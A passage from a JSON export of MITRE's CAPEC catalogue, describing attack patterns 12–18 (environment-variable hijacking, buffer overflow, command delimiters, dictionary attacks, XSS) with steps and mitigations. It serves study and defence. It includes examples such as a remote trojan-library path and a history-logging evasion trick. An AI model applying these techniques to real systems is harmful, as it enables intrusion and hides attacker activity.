Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"}]}},"12":{"ID":"12","Name":"Choosing Message Identifier","Abstraction":"Standard","Status":"Draft","Description":"This pattern of attack is defined by the selection of messages distributed over via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary\'s identifier to more a privileged one.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"PeerOf","CAPEC_ID":"21"},{"Nature":"ChildOf","CAPEC_ID":"216"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Determine the nature of messages being transported as well as the identifiers to be used as part of the attack"},{"Step":"2","Phase":"Experiment","Description":"If required, authenticate to the distribution channel"},{"Step":"3","Phase":"Experiment","Description":"If any particular client\'s information is available through the transport means simply by selecting a particular identifier, an attacker can simply provide that particular identifier."},{"Step":"4","Phase":"Experiment","Description":"Attackers with client access connecting to output channels could change their channel identifier and see someone else\'s (perhaps more privileged) data."}]},"Prerequisites":{"Prerequisite":["Information and client-sensitive (and client-specific) data must be present through a distribution channel available to all users.","Distribution means must code (through channel, message identifiers, or convention) message destination in a manner visible within the distribution means itself (such as a control channel) or in the messages themselves."]},"Skills_Required":{"Skill":["All the attacker needs to discover is the format of the messages on the channel/distribution means and the particular identifier used within the messages.",{"Level":"Low"}]},"Resources_Required":{"Resource":"The Attacker needs the ability to control source code or application configuration responsible for selecting which message/channel id is absorbed from the public distribution means."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":[{"p":["Associate some ACL (in the form of a token) with an authenticated user which they provide middleware. The middleware uses this token as part of its channel/message selection for that client, or part of a discerning authorization decision for privileged channels/messages.","The purpose is to architect the system in a way that associates proper authentication/authorization with each channel/message."]},"Re-architect system input/output channels as appropriate to distribute self-protecting data. That is, encrypt (or otherwise protect) channels/messages so that only authorized readers can see them."]},"Example_Instances":{"Example":"A certain B2B interface on a large application codes for messages passed over an MQSeries queue, on a single \\"Partners\\" channel. Messages on that channel code for their client destination based on a partner_ID field, held by each message. That field is a simple integer. Attackers having access to that channel, perhaps a particularly nosey partner, can simply choose to store messages of another partner\'s ID and read them as they desire. Note that authentication does not prevent a partner from leveraging this attack on other partners. It simply disallows Attackers without partner status from conducting this attack."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"201"},{"CWE_ID":"306"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary"},"Previous_Entry_Name":["Choosing a Message/Channel Identifier on a Public/Multicast Channel",{"Date":"2015-12-07"}]}},"13":{"ID":"13","Name":"Subverting Environment Variable Values","Abstraction":"Detailed","Status":"Stable","Description":"The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker\'s goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"77"},{"Nature":"CanPrecede","CAPEC_ID":"14"},{"Nature":"PeerOf","CAPEC_ID":"10"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The attacker probes the application for information. Which version of the application is running? Are there known environment variables? etc."},{"Step":"2","Phase":"Experiment","Description":"The attacker gains control of an environment variable and ties to find out what process(es) the environment variable controls."},{"Step":"3","Phase":"Exploit","Description":"The attacker modifies the environment variable to abuse the normal flow of processes or to gain access to privileged resources."}]},"Prerequisites":{"Prerequisite":["An environment variable is accessible to the user.","An environment variable used by the application can be tainted with user supplied data.","Input data used in an environment variable is not validated properly.","The variables encapsulation is not done properly. For instance setting a variable as public in a class makes it visible and an attacker may attempt to manipulate that variable."]},"Skills_Required":{"Skill":["In a web based scenario, the client controls the data that it submitted to the server. So anybody can try to send malicious data and try to bypass the authentication mechanism.",{"Level":"Low"},"Some more advanced attacks may require knowledge about protocols and probing technique which help controlling a variable. The malicious user may try to understand the authentication mechanism in order to defeat it.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Accountability","Impact":"Hide Activities"}]},"Mitigations":{"Mitigation":["Protect environment variables against unauthorized read and write access.","Protect the configuration files which contain environment variables against illegitimate read and write access.","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system.","Apply the least privilege principles. If a process has no legitimate reason to read an environment variable do not give that privilege."]},"Example_Instances":{"Example":["Changing the LD_LIBRARY_PATH environment variable in TELNET will cause TELNET to use an alternate (possibly Trojan) version of a function library. The Trojan library must be accessible using the target file system and should include Trojan code that will allow the user to log in with a bad password. This requires that the attacker upload the Trojan library to a specific location on the target. As an alternative to uploading a Trojan file, some file systems support file paths that include remote addresses, such as \\\\\\\\172.16.2.100\\\\shared_files\\\\trojan_dll.dll. See also: Path Manipulation (CVE-1999-0073)","The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \\"ignorespace\\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \\"ignoredups\\". In some Linux systems, this is set by default to \\"ignoreboth\\" which covers both of the previous examples. This means that \\" ls\\" will not be saved, but \\"ls\\" would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"353"},{"CWE_ID":"285"},{"CWE_ID":"302"},{"CWE_ID":"74"},{"CWE_ID":"15"},{"CWE_ID":"73"},{"CWE_ID":"20"},{"CWE_ID":"200"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1562.003","Entry_Name":"Impair Defenses:Impair Command History Logging"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.006","Entry_Name":"Hijack Execution Flow:Dynamic Linker Hijacking"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.007","Entry_Name":"Hijack Execution Flow:Path Interception by PATH Environment Variable"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Examples-Instances, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Mitigations, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"14":{"ID":"14","Name":"Client-side Injection-induced Buffer Overflow","Abstraction":"Detailed","Status":"Draft","Description":"This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service. This hostile service is created to deliver the correct content to the client software. For example, if the client-side application is a browser, the service will host a webpage that the browser loads.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target client-side application] The adversary identifies a target client-side application to perform the buffer overflow on. The most common are browsers. If there is a known browser vulnerability an adversary could target that."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer.","Technique":["Many times client side applications will be open source, so an adversary can examine the source code to identify possible injection vectors.","Examine APIs of the client-side application and look for areas where a buffer overflow might be possible."]},{"Step":"3","Phase":"Experiment","Description":"[Create hostile service] The adversary creates a hostile service that will deliver content to the client-side application. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary\'s choosing.","Technique":["If the client-side application is a browser, the adversary will create a service that delivers a malicious webpage to the browser.","Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the injection vector, the adversary delivers the content to the client-side application using the hostile service and overflows the buffer.","Technique":["If the adversary is targeting a local client-side application, they just need to use the service themselves.","If the adversary is attempting to cause an overflow on an external user\'s client-side application, they must get the user to attach to their service by some other means. This could be getting a user to visit their hostile webpage to target a user\'s browser."]}]},"Prerequisites":{"Prerequisite":["The targeted client software communicates with an external server.","The targeted client software has a buffer overflow vulnerability."]},"Skills_Required":{"Skill":["To achieve a denial of service, an attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap requires a more in-depth knowledge and higher skill level.",{"Level":"High"}]},"Indicators":{"Indicator":"An example of indicator is when the client software crashes after executing code downloaded from a hostile server."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["The client software should not install untrusted code from a non-authenticated server.","The client software should have the latest patches and should be audited for vulnerabilities before being used to communicate with potentially hostile servers.","Perform input validation for length of buffer inputs.","Use a language or compiler that performs automatic bounds checking.","Use an abstraction library to abstract away risky APIs. Not a complete solution.","Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Ensure all buffer uses are consistently bounds-checked.","Use OS-level preventative functionality. Not a complete solution."]},"Example_Instances":{"Example":{"div":["Attack Example: Buffer Overflow in Internet Explorer 4.0 Via EMBED Tag",{"style":"color:#32498D; font-weight:bold;"},"<EMBED TYPE=\\"audio/midi\\" SRC=\\"/path/file.mid\\" AUTOSTART=\\"true\\">",{"style":"margin-left:10px;","class":"informative"}],"p":["Authors often use <EMBED> tags in HTML documents. For example","If an attacker supplies an overly long path in the SRC= directive, the mshtml.dll component will suffer a buffer overflow. This is a standard example of content in a Web page being directed to exploit a faulty module in the system. There are potentially thousands of different ways data can propagate into a given system, thus these kinds of attacks will continue to be found in the wild."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"353"},{"CWE_ID":"118"},{"CWE_ID":"119"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"15":{"ID":"15","Name":"Command Delimiters","Abstraction":"Standard","Status":"Draft","Description":"An attack of this type exploits a programs\' vulnerabilities that allows an attacker\'s commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"137","Exclude_Related":{"Exclude_ID":"403"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Assess Target Runtime Environment] In situations where the runtime environment is not implicitly known, the attacker makes connections to the target system and tries to determine the system\'s runtime environment. Knowing the environment is vital to choosing the correct delimiters.","Technique":["Port mapping using network connection-based software (e.g., nmap, nessus, etc.)","Port mapping by exploring the operating system (netstat, sockstat, etc.)","TCP/IP Fingerprinting","Induce errors to find informative error messages"]},{"Step":"2","Phase":"Explore","Description":"[Survey the Application] The attacker surveys the target application, possibly as a valid and authenticated user","Technique":["Spidering web sites for all available links","Inventory all application inputs"]},{"Step":"3","Phase":"Experiment","Description":"[Attempt delimiters in inputs] The attacker systematically attempts variations of delimiters on known inputs, observing the application\'s response each time.","Technique":["Inject command delimiters using network packet injection tools (netcat, nemesis, etc.)","Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.)","Enter command delimiters directly in input fields."]},{"Step":"4","Phase":"Exploit","Description":"[Use malicious command delimiters] The attacker uses combinations of payload and carefully placed command delimiters to attack the software."}]},"Prerequisites":{"Prerequisite":"Software\'s input validation or filtering must not detect and block presence of additional malicious command."},"Skills_Required":{"Skill":["The attacker has to identify injection vector, identify the specific commands, and optionally collect the output, i.e. from an interactive session.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design: Perform allowlist validation against a positive specification for command length, type, and parameters.","Design: Limit program privileges, so if commands circumvent program input validation or filter routines then commands do not running under a privileged account","Implementation: Perform input validation for all remote content.","Implementation: Use type conversions such as JDBC prepared statements."]},"Example_Instances":{"Example":{"p":["By appending special characters, such as a semicolon or other commands that are executed by the target process, the attacker is able to execute a wide variety of malicious commands in the target process space, utilizing the target\'s inherited permissions, against any resource the host has access to. The possibilities are vast including injection attacks against RDBMS (SQL Injection), directory servers (LDAP Injection), XML documents (XPath and XQuery Injection), and command line shells. In many injection attacks, the results are converted back to strings and displayed to the client process such as a web browser without tripping any security alarms, so the network firewall does not log any out of the ordinary behavior.","LDAP servers house critical identity assets such as user, profile, password, and group information that is used to authenticate and authorize users. An attacker that can query the directory at will and execute custom commands against the directory server is literally working with the keys to the kingdom in many enterprises. When user, organizational units, and other directory objects are queried by building the query string directly from user input with no validation, or other conversion, then the attacker has the ability to use any LDAP commands to query, filter, list, and crawl against the LDAP server directly in the same manner as SQL injection gives the ability to the attacker to run SQL commands on the database."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"146"},{"CWE_ID":"77"},{"CWE_ID":"184"},{"CWE_ID":"78"},{"CWE_ID":"185"},{"CWE_ID":"93"},{"CWE_ID":"140"},{"CWE_ID":"157"},{"CWE_ID":"138"},{"CWE_ID":"154"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"16":{"ID":"16","Name":"Dictionary-based Password Attack","Abstraction":"Detailed","Status":"Draft","Description":{"p":["An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user\'s account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.","Dictionary Attacks differ from similar attacks such as Password Spraying (CAPEC-565) and Credential Stuffing (CAPEC-600), since they leverage unknown username/password combinations and don\'t care about inducing account lockouts."]},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"49"},{"Nature":"CanPrecede","CAPEC_ID":"600"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"560"},{"Nature":"CanPrecede","CAPEC_ID":"561"},{"Nature":"CanPrecede","CAPEC_ID":"653"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine application\'s/system\'s password policy] Determine the password policies of the target application/system.","Technique":["Determine minimum and maximum allowed password lengths.","Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).","Determine account lockout policy (a strict account lockout policy will prevent brute force attacks)."]},{"Step":"2","Phase":"Explore","Description":"[Select dictionaries] Pick the dictionaries to be used in the attack (e.g. different languages, specific terminology, etc.)","Technique":["Select dictionary based on particular users\' preferred languages.","Select dictionary based on the application/system\'s supported languages."]},{"Step":"3","Phase":"Explore","Description":"[Determine username(s) to target] Determine username(s) whose passwords to crack.","Technique":["Obtain username(s) by sniffing network packets.","Obtain username(s) by querying application/system (e.g. if upon a failed login attempt, the system indicates whether the entered username was valid or not)","Obtain usernames from filesystem (e.g. list of directories in C:\\\\Documents and Settings\\\\ in Windows, and list in /etc/passwd in UNIX-like systems)"]},{"Step":"4","Phase":"Exploit","Description":"[Use dictionary to crack passwords.] Use a password cracking tool that will leverage the dictionary to feed passwords to the system and see if they work.","Technique":["Try all words in the dictionary, as well as common misspellings of the words as passwords for the chosen username(s).","Try common combinations of words in the dictionary, as well as common misspellings of the combinations as passwords for the chosen username(s)."]}]},"Prerequisites":{"Prerequisite":["The system uses one factor password based authentication.","The system does not have a sound password policy that is being enforced.","The system does not implement an effective password throttling mechanism."]},"Skills_Required":{"Skill":["A variety of password cracking tools and dictionaries are available to launch this type of an attack.",{"Level":"Low"}]},"Resources_Required":{"Resource":"A machine with sufficient resources for the job (e.g. CPU, RAM, HD). Applicable dictionaries are required. Also a password cracking tool or a custom script that leverages the dictionary database to launch the attack."},"Indicators":{"Indicator":"Many invalid login attempts are coming from the same machine (same IP address) or for the same log in name. The login attempts use passwords that are dictionary words."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Create a strong password policy and ensure that your system enforces this policy.","Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.","Leverage multi-factor authentication for all authentication services."]},"Example_Instances":{"Example":["A system user selects the word \\"treacherous\\" as their passwords believing that it would be very difficult to guess. The password-based dictionary attack is used to crack this password and gain access to the account.",{"p":["The Cisco LEAP challenge/response authentication mechanism uses passwords in a way that is susceptible to dictionary attacks, which makes it easier for remote attackers to gain privileges via brute force password guessing attacks.","Cisco LEAP is a mutual authentication algorithm that supports dynamic derivation of session keys. With Cisco LEAP, mutual authentication relies on a shared secret, the user\'s logon password (which is known by the client and the network), and is used to respond to challenges between the user and the Remote Authentication Dial-In User Service (RADIUS) server.","Methods exist for someone to write a tool to launch an offline dictionary attack on password-based authentications that leverage Microsoft MS-CHAP, such as Cisco LEAP. The tool leverages large password lists to efficiently launch offline dictionary attacks against LEAP user accounts, collected through passive sniffing or active techniques."]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"521"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"654"},{"CWE_ID":"307"},{"CWE_ID":"308"},{"CWE_ID":"309"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Description, Mitigations, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"17":{"ID":"17","Name":"Using Malicious Files","Abstraction":"Standard","Status":"Draft","Description":"An attack of this type exploits a system\'s configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"122"},{"Nature":"CanPrecede","CAPEC_ID":"233"}]},"Prerequisites":{"Prerequisite":"System\'s configuration must allow an attacker to directly access executable files or upload files to execute. This means that any access control system that is supposed to mediate communications between the subject and the object is set incorrectly or assumes a benign environment."},"Skills_Required":{"Skill":["To identify and execute against an over-privileged system interface",{"Level":"Low"}]},"Resources_Required":{"Resource":"Ability to communicate synchronously or asynchronously with server that publishes an over-privileged directory, program, or interface. Optionally, ability to capture output directly through synchronous communication or other method such as FTP."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege","Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.","Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables."]},"Example_Instances":{"Example":{"p":["Consider a directory on a web server with the following permissions","This could allow an attacker to both execute and upload and execute programs\' on the web server. This one vulnerability can be exploited by a threat to probe the system and identify additional vulnerabilities to exploit."],"div":["drwxrwxrwx 5 admin public 170 Nov 17 01:08 webroot",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"732"},{"CWE_ID":"285"},{"CWE_ID":"272"},{"CWE_ID":"59"},{"CWE_ID":"282"},{"CWE_ID":"270"},{"CWE_ID":"693"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.010","Entry_Name":"Hijack Execution Flow:Services File Permissions Weakness"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Accessing, Modifying or Executing Executable Files",{"Date":"2018-07-31"}]}},"18":{"ID":"18","Name":"XSS Targeting Non-Script Elements","Abstraction":"Detailed","Status":"Draft","Description":"This attack is a form of Cross-Site Scripting (XSS) where malicious scripts are embedded in elements that are not expected to host scripts such as image tags (<img>), comments in XML documents (< !-CDATA->), etc. These tags may not be subject to the same input validation, output validation, and other content filtering and checking routines, so this can create an opportunity for an attacker to tunnel through the application\'s elements and launch a XSS attack through other elements. As with all remote attacks, it is important to differentiate the ability to launch an attack (such as probing an internal network for unpatched servers) and the ability of the remote attacker to collect and interpret the output of said attack.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"592"},{"Nature":"ChildOf","CAPEC_ID":"588"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Spider] Using a browser or an automated tool, an attacker records all entry points for inputs that happen to be reflected in a client-side non-script element. These non-script elements can be located in the HTML content (head, body, comments), in an HTML tag, XML, CSS, etc.","Technique":["Use a spidering tool to follow and record all non-static links that are likely to have input parameters (through forms, URL, fragments, etc.) actively used by the Web application.","Use a proxy tool to record all links visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Probe identified potential entry points for XSS vulnerability] The attacker uses the entry points gathered in the \\"Explore\\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.","Technique":["Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side non-script elements context and observe system behavior to determine if script was executed. Since these probes may have to be injected in many different types of non-script elements, they should cover a variety of possible contexts (CSS, HTML tag, XML, etc.).","Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side non-script elements context and observe system behavior to determine if script was executed. Since these probes may have to be injected in many different types of non-script elements, they should cover a variety of possible contexts (CSS, HTML tag, XML, etc.).","Use a proxy tool to record results of the created requests."]},{"Step":"3","Phase":"Exploit","Description":"[Steal session IDs, credentials, page content, etc.] As the attacker succeeds in exploiting the vulnerability, they can choose to steal user\'s credentials in order to reuse or to analyze them later on.","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and sends document information to the attacker.","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Forceful browsing] When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user\'s current network (Internet or not).","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and performs actions on the same web site","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities)."]},{"Step":"5","Phase":"Exploit","Description":"[Content spoofing] By manipulating the content, the attacker targets the information that the user would like to get from the website.","Technique":"Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and exposes attacker-modified invalid information to the user on the current web page."}]},"Prerequisites":{"Prerequisite":"The target client software must allow the execution of scripts generated by remote hosts."},"Skills_Required":{"Skill":["To achieve a redirection and use of less trusted source, an adversary can simply edit content such as XML payload or HTML files that are sent to client machine.",{"Level":"Low"},"Exploiting a client side vulnerability to inject malicious scripts into the browser\'s executable process.",{"Level":"High"}]},"Resources_Required":{"Resource":"Ability to include malicious script in document, e.g. HTML file, or XML document. Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read 